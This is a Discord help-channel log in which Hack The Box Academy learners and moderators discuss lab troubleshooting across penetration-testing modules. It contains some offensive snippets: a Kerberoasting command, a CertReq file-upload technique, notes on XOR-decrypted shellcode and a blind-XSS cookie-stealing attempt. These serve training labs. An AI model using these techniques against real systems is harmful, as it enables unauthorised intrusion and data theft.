#modules
Footprinting yeah?
Could also be an issue of timeout over that method
yea, do you have CPTS?
No
yea i challenged myself to do pen tester job path in 35 days
Speed isn't as important as understanding
yes i know i make notes on everything in notion
and before sleeping i go back
to look what i have done
Footprinting is t2 so deleting your messages bc they're spoiling content
Also curl -k worked for me
yea fine
yeap strange
@sage quest : If you still need some help, you can DM 🙂
Was able to complete with curl, not sure your issue. But seems connection related
Hey guys does anyone know how to find this answer from hashcat password cracking? ****
if it is about getting into dev i need nudge too 
I found a password in the ntds.dit file but the answer is completely different and I don't understand how you get to there
You can DM if you still need a nudge.
You can use hashes to authenticate as a user in windows btw
you can dm me
sure thanks sir
Didn't know that but I don't have an ip i just have a responder.log file and a ntds.dit file
hello there! Hope to be in the right place. I just finished the "introduction to malware analysis" module and all the bin exploitation path. I'm quite prepared in reversing and binary exploitation (thx to pwn.college). I really would go deeper in malware analysis. Do you have any suggestions or resources? 🙏
hiii
Someone to study with?
Intro to Network Traffic Analysis
If I wish to start a capture without hostname resolution, verbose output, showing contents in ASCII and hex, and grab the first 100 packets; what are the switches used? please answer in the order the switches are asked for in the question.
its all the time Incorrect answer
I can't send messages in the General channel. It shows that I don't have permission
Follow the instructions in #welcome to gain access
Hey guys,
I'm stuck in the module "Pentest in a Nutshell" in the "Windows privilege escalation".
I cannot answer the question which type of privilege escalation was used.
Overall I did the whole escalation on my own. But I don't know how it is called. Even ChatGPT cannot help..
Please help, I'm already frustrated and want to finalize this last answer.
Thanks!!
Hello, I have an issue with module AD attacks section: Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
I want to perform kerberoasting cross forest , but through a tunnel from my linux machine passing by the provided box. I used ligolo and set up local dns. but I get connection refused :
cmd: GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/forend
It works fine when I dont use tunnel and from the provided machine
thank you 🙂
you need to have all the domains in your own host; Kerberos doesn't like you not having the FQDN, DN, and such within your hosts file
I have both domains in hosts
Hi anybody that did sliver c2 module recently
Hey, I think there's an issue with the Module 3 practical lab ("Windows Event Logs & Finding Evil") in the SOC Analyst path. We're supposed to analyze event ID 4624, but it's missing from the Event Viewer on the RDP machine—even after applying the filter. I’ve attached a screenshot as proof.
someone can help me?
there should be a domain controller to connect to no?
Hi everyone , i need help with T.E T.E http attacks
#welcome holds all the answers
hello, could I dm someone about the second skill assessment in the nosql injection module?
Hi everyone , i need help with T.E T.E http attacks
anyone please
hi
I'm doing the Intro to Academy's Purple Modules module and I'm exploiting CVE-2024-22120, in the question Exploit the CVE-2024-22120 vulnerability on the spawned target and enter the content of the root.txt file located at the /root directory as in your answer. but for some reason it doesn't work for me in any way. Can anyone give me more details?
???
Hello folks
I'm trying to exploit that CVE but I have no results and it gives me an error.
On “INTRO TO WINDOWS EVASION - DYNAMIC ANALYSIS”
I’m getting a GPO error . When trying to get a reverse shell
May I assume that expected , assuming the scan flagged it ? I don’t think so
I’m not admin to disable GPOs on target . Any nudges please ? 99.99% sure my super shell via Micro shell is good to go 🙂
I'm so lost on the linux priv esc skill assessment, i cant get flag4. Can i get a nudge?
This does not look like a scanning issue.
What Am I missing here? 🙂
Hi! I’m working on an HTB module that says:
"Aside from blogs related to retired HTB boxes, it is also worth seeking out blog write-ups on recent exploits/attacks, Active Directory exploitation techniques, CTF event write-ups, and bug bounty report write-ups."
I’d love to know, what are your favorite websites covering these topics?
Pivoting, Tunneling, and Port Forwarding
Skill Assessment:
does anyone have reliable way of performing nmap scans of remote hosts
i sometimes get that the host is up, sometimes not
but ALWAYS no matter what i try, the ports (3389 specifically but others too) are always filtered
the earlier sections touched briefly upon that but it doesnt work...
Host is up.
PORT STATE SERVICE VERSION
3389/tcp filtered ms-wbt-server
i can connect to the port but i cant perform general nmap scans
sudo
tried
if you sure that the host is up , add -Pn flag to skip host discovery
if you get filtered through pivoting, and you're using ligolo check your routes, if you're using port forwarding check your socks proxy
I tried these:
Metasploit
Shuttle
Chisel (libraries got fucked)
And couple more
Haven't tried that one
The thing is I can interact with the port
When I do my routing properly
But I can't ping nor nmap scan it
you cant ping because often the target unreachable windows host blocks icmp packets
what command you used?
Im stuck on a module, I have found the flag but it won't take it.
Module link: https://academy.hackthebox.com/module/19/section/108
Page name: Nmap scripting engine (NSE)
The question is "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."
I have tried nmap -sV <ip address> -sC and indeed in one of the services I get the flag HTB{code}, I copy it and it doesn't work, I've also tried putting in only the code inside the parentheses but nothing
check for spaces
in the field for the flag
no spaces
I read this yesterday when I was tired and now re-reading it now makes so much sense
am trying to set up an nfs server on my vm but it gets an error while mounting the directory
```
sudo mount -t nfs 192.168.204.48:/home/kali ./target-NFS/ -o nolock 32 ↵
mount.nfs: access denied by server while mounting 192.168.204.48:/home/kali
╭─kali@kali ~
╰─$ cat /etc/exports 32 ↵
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/kali 10.129.14.0/24(sync,rw,no_subtree_check)
╭─kali@kali ~
╰─$ showmount -e 192.168.204.48
Export list for 192.168.204.48:
/home/kali 10.129.14.0/24
```
Anyone know how to deal with incredibly unstable RDP connections on academy? I'm trying to finish off the footprinting modules, but the final challenges have RDP machines that crash on me within a minute of accessing them. I've tried multiple different connection tools, my own VPNd machine, the parrot box HTB gives you, but it clearly seems to be a server side issue. I have to reset their box for it to work again, and even when I reset it, the RDP machine works for maybe 30 seconds and becomes inaccessible after it inevitably crashes.
Hello, can someone help me with the AD trusts attacks skill assessment ? I am getting error KDC_ERR_PADATA_TYPE_NOSUPP but have no idea where the issue is.
would anyone who finished the linux priv esc module be willing to help me out on the skill assessment?
Can I reset all progress on my HTB account without deleting it?
have you tried to download a different vpn file that has a better connection?
You can’t
If you are still stuck you can DM.
Well darn
hi, i'd appreciate some advice on Password Attacks Lab-hard. i'm trying to move the Backup.vhd. i notice it does not work with smbclient due to being too large. i have attempted to move it with ||smbserver.py|| it just hangs... it will show the file on my attacker machine, but when i try to convert it to a hash to crack it says it's missing its signature. i have also tried to move it with xfreerdp || /drive:starr,/home/kali/xxxxx/xxxxx || i open powershell as david and || move Backup.vhd \tsclient\starr || and it just hangs.
I think I've seen this before with time synchronization as the root cause - can you sync your time with the DC? (Eg with ntpupdate)
I'm stuck on the android security question
Which Signature Scheme versions are vulnerable to CVE-2017-13156? (Format: 3 words)
anyone have any idea how they want the answer to be formatted. I've tried quite a few different ways
Dm me if you still need help
It's at the top of the page.
Try changing the MTU on the VPN connection and switching to the TCP option, others have had success with this.
https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn#h_ccf26ec237
All you need to know about the VPN Connection for Academy
Read the file.
Could any1 pls guide me on some of the Linux fundamentals bit where I have to find the student home directory I've found the answer in a forum but I don't want to use the answer without understanding how u get to it
I'd probably read back over the relevant module and section, and try to come to that understanding yourself
in the case anyone else is around that can help me with this issue, i took a few screenshots. i created a text file and i could copy it over to my kali just fine, but when i tried to do the same with the Backup.vhd file, it just hangs.
Don't just search for answers, it doesn't help you learn at all @deep pier
That said, as it is a Tier 0 module, you can just flat out ask your question here @deep pier
Just know that for module above Tier 0, posting direct questions like that is not permitted.
24 hours later still trying to figure out the foothold...
In Shells & Payloads -> The Live Engagement there is this question
I did a quick search and found that there is a ||stageless payload that utilizes an exploit through a PUT request that seems harmless due to the payload being base64 encoded.|| However I'm realizing that I have yet to figure out how you're expected to find the credentials for the server configuration panel.
Enumerate your foothold a little bit.
Well, I have. I've tried finding ||hidden directories that may show a webpage or somewhere in the html that may feature a lingering comment with credentials|| and all I was able to find was the username. I'm not sure what I'm missing here
Look at what is on the desktop
🤦♂️ Thank you
try a different transfer method then
I tried smbserver.py as well. Does the same thing, hangs and gives me a partial file.
try using the tcp vpn -> setting it up again
I use tcp VPN. Perhaps I’ll try downloading a new VPN file.
I have tried but it's a lot harder since I'm a beginner
I'm also confused with how the SSH works
good god is there any reason why the foothold is so slow???
Has anyone finished the Skills Assessment 2 in the "Introduction to Windows Evasion Techniques" module? My file passes the checks but I can't get a shell to get the flag.
Hey, I just began the intro to linux module (newbie here). I'm on the question asking for the kernel release that is installed on the system in the VM. I've used the uname -r command and the output isn't being accepted as an answer. I've navigated to different files that could have this information, but it's all the same. Anyone have any idea?
I just tested this, it worked for me. Take note of the question, it says the format (just the numbers)
Yeah that's the format I used. Here's what is output: 6.11+parrot-amd64
Looks like you're doing it on the pwnbox instead of the target
or maybe your own VM
You need to SSH into the spawned target then use the command
Ah gotcha. I'll give it a go
Yeah once logged in via ssh it still outputs the same. How do I get into the spawned target?
Are you using the built-in pwnbox or your own virtual machine on the vpn?
doubt your ssh into the right thing
spawn instance != spawn target
they are completely different things
instance == pwnbox == in browser vm
target == victim vm == the thing you're connecting to for the exercise
does anyone remember the name of browser extension that redacted the module answers or even question? i wanted to redo few modules
it's not officially from HTB so be cautious, but it's here https://github.com/sudoheader/htb-academy-answer-hider
Hide answers on HackTheBox Academy and Enterprise.
thanks
Login Brute Forcing
Skills Assessment Part 1
https://academy.hackthebox.com/module/57/section/515
I think you are supposed to try the basic-auth-user from the text, but I use the rockyou wordlist and the thing loads forever
Sql injection fundamentals skills assessment
I cant find a directory where i can write a webshell file
Can i get a nudge
i'm currently running into this issue
I ssh in, after a short while the ssh freezes, machine doesn't respond to pings
it's worth noting the machine itself seems very, very slow
i'm wondering if it's running out of ram, maybe
nevermind, think I worked it out 😄
i'm just going to leave this section until someone can get back to me on this. can someone try reproducing the problem themselves, see if they run into the same issue? link to the section is here https://academy.hackthebox.com/module/24/section/514
actually im still stuck, casting it to a string dont even work ? 😄
If i remember there's a file, or if you dont know what the target is running, "files" that show the webroot.
And using sql you had to read contents of the file
It also provided passwords.txt you tried using that first?
i didnt notice that, is it from the text?
Yeah also be sure to read the skills assessment closely or the questions, I always either wasted much time either cause I missed something or misread it.
Why subscribe as gold or platinum monthly does not include tier 3 modules?
the monthly plans will just give you cubes
so you can access any module with them if you have enough cubes
messaged you
only student sub gives access to all modules up to tier 2
how to get the http service and api attacks module free?
I've got a question I've managed to work out how to ssh into the machine and it's saying the authenticity of host can't be established this is hack the box which is my first time doing it
Should I continue or press no?
press yes
everytime you need to ssh to new machine you always need to do this
earn cubes
this isnt a live chat support
just say me
be patient
ok thx
Here. Next time, be patient and wait a bit longer than 10 seconds to write ...
Ok tysm
Why is it saying that SSH connection is closed by port 22 and how do I fix it?
It means default port for ssh is closed
maybe it opens on other port
you can try to do port scanning to find the open port for ssh
But I've tried to SSH into the Linux fundamentals machine using the ip address provided is there anyway around it?
can you show me the question? to make sure I am guiding you correctly
Ok
I can't send pics here so ill js dm u if that's fine with u
@novel shoal
Jokky?
It seems like you need to ssh to machine first
try to ssh to machine again
if the port 22 is still closed you need to do port scanning to find the open ssh port
Ok thx
i'm stuck at -SQLMAP ESSENTIALS->skill assessment i searched the entire web app i found a request with json data and tested it it does not seem that it have some bypasses , it found a sqli but does not give me any data retrieved ,and this is the only form that gives me params so i can test it in sqlmap , can someone guide me on it
Have you tried to use it with tamper?
the request don't have any data to use with tamper
I got the flag by using simple sqlmap command nothing unique
can i dm you with the request ?
yes
hey guys im doing soc analyst prerequisites and doing web requests module and i dont understand this error i did the same commands earlier
oh wait nvm i figure it out
nvm i still didnt figure it out
Any clue on this?
Thanks!!
ok turned out i didnt add /api.php on the link i put in so the command misunderstood the argument that i meant to put in
silly me 
This module page is written... in a very unclear way for a beginner.
https://academy.hackthebox.com/module/143/section/1485
-
Where does the author get the username "damundsen" from? I understand that the username corresponds to the user "Dana Amundsen," but how was the "damundsen" username obtained through PowerShell/PowerView? The author just mentions it in the explanation, but it's not shown anywhere in the command output, so it's impossible to logically follow the thought process.
-
How exactly do you “switch to the wley user”? It says “set the wley user as our starting node,” but how do you actually do that?
I'm going through this as part of CPTS prep. It's clear that you already need to know how to use BloodHound and understand Active Directory in order to follow this module...
This is my screenshot. Here I’ve selected the user WLEY. Where is the "Outbound Control Rights" block? I only see "INBOUND CONTROL RIGHTS". Does that mean I’m searching incorrectly?
which module and section is this
Active Directory Enumeration & Attacks > ACL Enumeration
Hello! Im stuck on the question What version of the SMB server is running on the target system? Submit the entire banner as the answer. of the SMB part of the module footprinting
I have tried everything to grab the banner
but htb does not give me right answer
As far as the usernames go, have you seen the wley user's full name somewhere before in the example? If you have, it's reasonable to assume you can turn Dana's name into her username. If not, I'm not sure.
I'm stuck in LFI php filter part Question I run the fuzzing command correctly but the out is the all word list in the word list, it's not export me only the valid one, anyone can help me on this?
I have tried nmap multiple ways, rpc enumeration, enum4linux, enum4linux-ng and so on
nmap -sC -sV
nmap --script banner
Hi everyone I need help with TE TE http attacks, will anyone help me please
That's the question, how "Dana Amundsen" turns into the username "damundsen"?
assuming you have knowledge of how usernames are generated within the environment you're testing (first initial + last name)
What you've done already should have given you the answer. Are you allowed to post the answer you're trying in this chat? I'm not sure on the rules.
oh god I have tried many
can I send them to you in dm?
Yeah
it's not obvious at all.. and how to get the username using PowerView?
ConvertFrom-SID $sid
you can DM if you want, I have done that module
or in the future
i believe you got an idea of how the usernames are generated based on the initial domain enumeration + password spraying
ufff... nice!
Until the current section there were no particular difficulties)
would be worth clarifying though how they got damundsen
and the second question. how to display the shown graph in BloodHound? the "OUTBOUND CONTROL RIGHTS" block is not displayed when selecting "WLEY@INLANEFREIGHT.LOCAL" as the initial object
under OUTBOUND OBJECT CONTROL, try clicking Transitive Object Control
hey i have problem on Footprinting - DNS module
i can't anser the last task
ah, i believe if you click First Degree Object Control under OUTBOUND OBJECT CONTROL, you should get the same graph
idk why it's not named OUTBOUND CONTROL RIGHTS. might be a different BloodHound version
i'll have to delete this though since it's revealing Tier II module content
if you can, remove the attachments from this message as well
you are absolutely right, yes.. everything was displayed when I clicked, as you said. I apparently have a newer version of BloodHound
after your tip I checked it on BloodHound GUI in Windows host, everything is correct!
Thanks!
Broken Authentication
Enumerating Users
https://academy.hackthebox.com/module/80/section/772
I can't seem to get the ffuf right. It just load for forever.
Hi I am new
I have a base Debian machine with my Obisdian notes. I also have a Windows VM with a Powershell session. Is it possible to copy command line output from my powershell session into my Obsidian notes? I cannot get the copy-paste to work with my Windows VM. I have no problems when I'm running a Parrot VM copying to and pasting between my host and VM.
depending on the vm there should be a copy/paste to/from host/guest
virtualbox calls it bilateral copy/paste
Ah, I'm using virt-manager, so I don't see that anywhere. It just works seamlessly with a Linux VM.... but with a Windows VM, nope.
@midnight sinew That module is above tier 0 please refrain from posting specifics about it, such as exploits or techniques
I didn't use proxychains, I used ligolo-ng for this fwiw
Ty but where am i supposed to ask ? (next time)
You can ask here, just don't reveal specifics
I am trying to double pivot: fine
I'm trying to access <machine name> from <machine name 2> to be able to use <specific exploit>: not fine
Fierce wordlists help. Also subdomains of subdomains
This has been asked and answered a dozen times at least lol
If anyone has some tips it would be helpful
@west arrow module is above t0 please don't spoil stuff for skill assessments :)
You can still dm me bro
I got some hints, thanks anyway
Sorry what does that mean
it means you revealed something about the skill assessment that other people could use to bypass doing it themselves and learning
also t0 == tier of the module; tier 0-4
yo guys for participating in CTFs is it better to follow the bug bounty hunter path or the pentester path
tier 0 are "free" modules
bug bounty path; pentester path focuses more on actually rooting an underlying system. CTFs rarely go past the vulnerability exploit aside from maybe pwn challenges
why could it be that i could find the flag in the "Firewall and IDS/IPS Evasion - Hard Lab" on the academy PWN box but not on my VM?
Windows Privilege Escalation - Skills assessment 1:
My Kali works fine normally, everything worked fine during the other modules, but working on the skills assessment, after getting a shell and while enumerating my session just hangs. Like totally, so I have to just shut the VM down and restart it. It's so odd. Never experienced this before and it's so weird. I have noticed a lot of latency while running commands on the target. But even though the target might be slow it shouldn't like completely freeze my attacking VM..? Anyone have experienced anything similar?
I've been doing a nmap and it said it would take 1h, then used the modules PWN box and it did it in less than half a minute @full wagon
Could be vpn servers overloaded or something
Or use the web VM if you're using your own
yeah, don't like using the pwnbox, but might have to give it a try for this part 👍
Footprinting
Medium Lab
I've got into the Windows user and found sa credentials for MSSQL, but keep getting generic error messages when trying to use them to log into SSMS (persisted after resetting target box), am I on the complete wrong track?
Your vm was running dns on 53
Pwnbox also utilizes the vpn servers, so this wouldn't track with your reasoning
Mssql supports several authentication methods
I advised you earlier with this
Don't reveal content: module is above t0
dig axfr the base domain; sub.sub.domain.htb
.
Ok I get it
I think about it before
I used to be afraid of wasting my time if I did it
The base dig might find something the auto tool doesn't
Is it ok if I use the pwnbox to do portswigger labs ?
yo guys
im on living off the land section
of file transfers
im trying to use certreq.exe for uploading a file to my linux
heres the command im using
txt```
and im getting this error
anybody has an idea
Are there any cloud modules ?
heres the syntax from LOLBAS
Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.
CertReq -Post -config https://www.example.org/file.ext C:\Windows\Temp\file.ext
Use case
Upload
Privileges required
User
Operating systems
Windows 10, Windows 11
ATT&CK® technique
T1105: Ingress Tool Transfer
I know there are business professional services for cloud, but any for us regular not business ppl
Prompt Injection Attacks --> Skills Assessment --> Assistant:(Alice), I'm happy to inform you that your account has been successfully banned .
where can i get the flag?
THM has far better support ngl
Found the flag in HTB format but it does not work.
Make sure there's no spaces
checked this. Its all whithout spaces
Anyone who can help with XSS Filter Bypasses in the Advanced XSS and CSRF Exploitation module?
Indeed, I had to kill dnsmasq, thank you
Any is a deprecated functionality; but maybe look somewhere else
Also you still have the subdomain in your pasted result
hey everyone I'm working through Password Attacks/Protected files. The lab is to brute force the password of Notes.zip. I have created my hash file and tried to run John and hashcat against it but its finishing very quickly with zero results even though I've made sure the hash file is in correct format. anyone have a hint for this?
The main point of digging the base domain is to get the list of all potential subdomains to sniff in: maybe look for stuff you didn't access before
Are you using the mutated wordlist?
yeah I'm using a mutated wordlist I created a few sections back but its as if its not running because its finishing in a couple seconds
John and hashcat can finish rockyou in seconds depending on the hash type
Mutated list is tiny in comparison
eh I dont think my pc is that good lol
Yep, its mutated correctly. This lab question has to do with user Kira, so it makes sense to try against her mutated password list first rather than use rockyou.
Its worth a shot to do the whole list
Never make full assumptions
It will take 1 second
I posted the results using the larger list here
You are assuming it's correct; but not checking other possibilities
No; that's rockyou
oh i understand now, my larger mut pass list
Larger list == the full mutated list, not the clipped version "for kira"
Hello i had a question about a challenge called SideClimbers
Thanks for the tips TLattice and ML, I see I should've been more thorough trying the wordlists first. felt like I was doing something wrong because it was finishing so quickly
Is there any way I can access the pwnbox besides constantly waiting for 1
Wrong channel: read and follow #welcome to access #challenges
No I don't think .. + they blocked me on discord ( I did a little think I don't remember but it not worst to be blocked)
https://academy.hackthebox.com/module/80/section/767
Broken Authentication
Brute-Forcing Password Reset Tokens
I can't find answer to the first and last questions to the module
DNS has always been designed to use both UDP and TCP port 53 from the start, with UDP being the default, and falls back to using TCP when it cannot communicate on UDP, typically when the packet size is too large to push through in a single UDP packet.
cant the UDP packet be split into multiple?
if that data is 1500 bytes and every UDP packet can hold 512 bytes, then it could be split into 3 packets, no?
DMd you
I'm on the Web Server Pivoting with Rpivot section, Question: Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer. I've set everything up but I can't seem to load the internal page using proxychains firefox-esr 172.16.5.129:80. However, I can see the raw output of the default Apache website if i run command : curl --socks4 127.0.0.1:9050 172.16.5.129:80. But where is the flag????
UDP can't guarantee they'll land in order
help me plz in android fundamentals Find the UID of the application com.android.settings. Use the command adb shell ls -l /full/path/ to inspect the file permissions and identify the application's UID from the output. i found the uid but its wrong why?
try just proxychains firefox and then load onto the site using the ip
your errors are network related, i would go over all the configurations and settings again and make sure they're accurate
can you try proxychains curl ? I have a suspicion its your proxychains conf
also those are from the mozilla servers
All right, this Intro to Assembly Language Skills Assessment is killing me. I finally got the first task done after struggling, but now I'm stuck on task 2. This stupid flag.s file is driving me insane lol. Any helpful tips?
try socks4 127.0.0.1 9050
This doesn't tell me much of anything. The error is clear, timeout means your packets are timing out before reaching the target. That tells me you have a misconfiguration somewhere. You should comb through each and every aspect to ensure it's setup correctly. VPN/Pwnbox, target, the proxy config, ports, etc. When asking for help here it also helps immensely if you say which module and section you're on.
changed to socks4 now i see page in browser! How will i know when to use socks4 or socks5?
been using socks5 up to this point
gotcha
you'll generally know if A doesn't work try B; or just avoid the issue if possible by using ligolo-ng instead
Haha yes. I was being silly and skipped the step where I ssh into the target. I just started on the instance spawn.
We're good now!
Sign the application myapp.apk and install it by either dragging and dropping it onto the device or using ADB. Make sure to first uninstall any previous versions of the app. After installation, tap on the app to start it. What is the message printed on the screen? how to sign the apk?
Yeah that one was rough.
It really is! I'm still trying to finish it. Any suggestions?
Yeah I modified the starter code to decrypt the chunks of the shellcode that were encrypted (xor), then put them into the registers like normal, grab them from memory and then run the shellcode on the target
Probably not the most elegant approach- like print debugging In assembly, but it worked
I see. So you ran it line by line and just cleaned it all up to get the correct shellcode? I've tried quite a few shellcodes and keep getting the Failed to run shellcode! error. It's so frustrating lol
Yeah I just dumped an xor(string,key) command in there before each value was written to memory.
One of the values has an issue you have to tweak to make sure the shellcode is valid. Run through the valid shellcode checklist from the module
Okay, thank you. I'm going to see what I can do. Just had to reset the whole thing, it was making me so mad lol.
👍
https://academy.hackthebox.com/module/134/section/1178
Bypassing Security Filters
Web Attacks
have send a command by URL. Can't seem to get flag out of it.
Hi
Module: Windows Privilege Escalation
Section: Citrix Break Out
Section Link: https://academy.hackthebox.com/module/67/section/2502
I have got the flag in pmorgan's Downloads. To escalate privilege, I wanted to execute the powershell scripts. I could not find those scripts in the server. I am not sure how to transfer these scripts to the Windows machine. Can anyone help?
Use some of the methods mentioned in the section or from the File Transfers module
Module {XSS}
Session hijacking
When trying to exploit blind xss on target (gets below error instead of cookies)
[Thu Apr 10 00:15:58 2025] redacted: Accepted
[Thu Apr 10 00:15:58 2025] redacted:[200]: GET /script.js
[Thu Apr 10 00:15:58 2025] redacted: Closing
[Thu Apr 10 00:15:58 2025] redacted: Accepted
[Thu Apr 10 00:15:58 2025] redacted: Closed without sending a request; it was probably just an unused speculative preconnection
[Thu Apr 10 00:15:58 2025] redacted: Closing
Any solution to fix this?
How do i hack any server
you don't
anyone else get this error in the skill assessment of crackmapexec module?
Try with the alternative - netexec, and see if you get that error
helloo After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.
i use this command to nslookup -type=NS inlanefreight.htb
search for query but i dont get anything what do i do
DNS records != type=NS
when you specify -type=NS you're only going to get records that are labeled as => NS
forget about it, i tried netexec with sudo privileges and it worked hehe
yeah
should i use axfr?
no axfr wouldnt work
hmm
okay i did it thanks
can someone help me with this please ; )
is your script.js pointing to the right thing?
not good with js. so should i send the script.js content here? coz idk if its spoiler or no ;v
but i think its pointing right
it's a spoiler, so no
it should point back to your own ip:port/index.php or whatever they had you make
yea its as u said
its making the get request for script.js then this > Closed without sending a request; it was probably just an unused speculative preconnection
its been 3 hours i m stuck on this
got it (i missed single quotes somehow even after copying the script content) 
i did it 🎉
Prompt Injection Attacks --> Skills Assessment --> CEO is banned, HackBot confirming this and gives an incorrect flag (HTB format). What now? Tried accessing admin panel as HackBot instructed but that still gives me an error: 'Access denied. Please provide in admin key in the GET-parameter "key".'
Tried several ways to send the admin key with GET parameters but none were taken.
Anyone any suggestions? HTB instructions are met but not sufficient enough to pass the test.
I am working on SA HTTPs/TLS Attacks but with padbuster I get 'Double check the Block Size and try again.' when I try to test padding vulnerability. I used the hash in the user cookie two times just as in the module is written and size 16 -encoding 1. Tried also different sizes like 4, 8, 32. Nothing works. tested on endpoint /token and /admin. Can someone help me with this?
If anyone is able to confirm this for me just so I understand this concept... (relating to MSF)
Say we utilize some exploit to get a foothold on a system via reverse_tcp. However we're stuck with low permissions. We enumerate with our newfound position and find an outdated tool that has a known exploit that can help elevate our privileges. We background this task.
We then select this particular module, then set the session to the prior background session. If we were to perform the exploit now, is the payload carried through our initial foothold? Or is it not working in that particular way (not necessarily mounted on but rather parallel, or does it vary?)
Anyone able to dm me for hints regarding NTLM relay attacks - skills assessment Question 4 ?
you can DM me
@ember lake
- That's illegal
- Against server rules to solicit illegal activities
depending on the privilege escalation module it will create a new session or upgrade your current session account to gain additional privileges
ok that makes sense thank you for clarifying !
can someone help, i’ve connected the openvpn but can’t ping the destination
Hi everyone I'm solving Linux Fundamentals currently and I'm stuck on Working With Web Services part....can u guys suggest a solution for this question: Find a way to start a simple HTTP server inside Pwnbox or your local VM using "npm". Submit the command that starts the web server on port 8080 (use the short argument to specify the port number).
Is the intro to binary reversing the only module that works on reversing?
Anyone any tips for finishing skills assessment in prompt engineering attack? CEO banned, now i apparently need a summary, but I don't know where to get it.
http-server , use man pages?
Attacking AD and NTDS.dit
Got one set of creds from brute-forcing usernames and pw's - doesn't let me connect with winrm? Is this normal? Please @ with any responses, thanks!
Ok I'll try this one...
See if you can use what you got to answer Q3 and use it with what is covered in the Farming Hashes section.
Chur
hello , I'm stuck in Introduction to Digital Forensics Skills Assessment , can anyone help
Hi anyone know why I keep getting this error while attempting the second RDP in "RDP and SOCKS Tunneling with SocksOverRDP" of "Pivoting, Tunneling, and Port Forwarding" module
Prompt Injection Attacks --> skills assessment --> banned the CEO but apparently i have to get a summary from somewhere. Any one any directions since HTB does not tell anything about this part?
can anyone help with file transfer module: Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.
this one
i did it hehe
Pls DM me with what exactly you tried (if possible with the exact prompts and screenshots), and I'm gonna look into it
In the Sliver C2 module, does anyone get the rpc error: code = Unknown desc = implant timeout when trying to upload beacons or other large files to a target machine? I have tried big timeout options but still it fails. Session is also alive and does not die during the upload.
if you need help you can dm me
In attacking thick client applications. When looking at the memory map. How do we know which rows would contain sensitive information? The module chooses that specific row because it says it has read write protection set but i see that many other rows have the same protections so is it trial and error or is there something more to it?
Hey guys, I'm working in the module "Kerberoasting - from Linux" but I can't find the way to get the password
Can anyone tell me that which linux distro is best for beginners who is shifting from windows to linux
i need help with ctf event everything allowed (mainly steganography)
Hi guys, can anyone help me with this question from Password Attacks module. Here is the question: Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. I have found the flag, but it keeps giving me an error. i have found and downloaded julio.txt file, but it says that the answer is wrong. Thank you in advance
Hey guys, is there someone can help with "XSS Filter Bypasses" in the Advanced CSRF and XSS module?
Hey all, just finished the remote port forwarding chapter in the Pivoting, Tunneling, and Port Forwarding module. The chapter explains steps to get a reverse shell through a pivot host to a host on the internal network, but the questions don't seem to relate to this at all. I tried to replicate the steps for practice and I was unable to, is this intended or have I probably messed up somewhere? Thanks!
"dont seem to relate" in the sense that they don't ask you to perform what it teaches...
If anyone could help me figure out in the shells and payloads module in the live engagement section how we know there is Java on the Apache tomcat sever and how to know which exploit to choose
They blocked me too, very wired minds there
But they respond to questions almost immediately
hey ya'll if im running hydra against a machines ssh service. Can I also run hydra against the same machines ftp service, or should you only attack one service at a time?
(Not sure if this belongs in this channel, lmk if I should delete)
Hello, I am on Introduction to Active Directory module.
I am stuck on AD Administration: Guided Lab Part I, When I am trying to RDP into machine, I am not able to login, but it does not load properly.
I tried revoking old VPN keys and changed my internet connection, still did not work. Please refer to the attached screenshot for reference. Any nudge would be helpful.
Same issue occurs on Pwnbox as well.
have you tried pressing enter a couple of times on the black screen?
hello i am doing metasploit module and do i need to download another vpn file or it should be the same cuz i cant ping the host
and openvpn command fails sometimes
You should be able to use the same Academy VPN file for all modules. Not all hosts respond to ICMP requests. Maybe try something like nmap -Pn?
Hello I can't connect to this can someone help me please ??
yea i went for the next module ill do it later
generally one service at a time
username incorrect
you're using htb_student, the username is htb-student
ohhh bruh yeah sure...
also, deducting points for using powershell in linux
I totally make this mistake too often to admit
idk what to use
I cant find it
yea its the same for next module 😄 😄 😄 i cant ping but i can nmap that great finding
literally just told you how
@mellow turret this isn't a hacker4hire server, read the #rules
@fathom pendant Host is up (3.1s latency).
All 1000 scanned ports on 10.129.237.17 are in ignored states.
Not shown: 922 filtered tcp ports (no-response), 78 filtered tcp ports (host-unreach)
this means that it is not reachable right?
menu bar
Sorry
i'm not support staff, reach out to support if you're having issues, make sure you're not using multiple vpn connections ip a if you see multiple tun connections, then you're running too many connections
thanks
try searching terminal
the $_ icon as i said
Hi.. Where can i ask for help resolving a task regarding
Introduction to Bash Scripting?
also that's the search bar; not menu bar (at the top) right next to powershell, is the terminal
there's a wifi hacking module, but it won't teach you to specifically hack your schools wifi
yes
ohh okay
you can ask here, but since the module is above tier 0; don't reveal module content such as scripts.
you can generalize your question with the module/section and what you're attempting
Ok. I'm having a problem with a for loop.. It feels like I'm missing some part of the information but I can't understand if there is some hidden data over the question or if there is only to use the data in the question.
Because all the answers I'm getting are wrong.
I'm using the Exercise Script with the question info
ah yeah so the loop should already exist in the script
you just need to input a conditional (if else)
stuck again.. I have tried all the commands from the page with the target ip and also nmap with various scripts to get any info but I don't seem to be getting anywhere.
Module name/link: FTP Footprinting, https://academy.hackthebox.com/module/112/section/1066
The question:
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
I can give more detail on what ive tried but I don't want to get the message deleted
Hmm.. Ok I'm doing it but the result I'm getting is wrong. Hmm will try some more
you need to check if the counter equals a value then it should print the length of that
as a note : echo can add an extra character, so be careful with that
what is index number ?
man ls
I dont find it maybe I didnt read it well
the option may not be called "index/--index" but searching for index yields results
to search within the manpages you can do /searchterm [Enter]
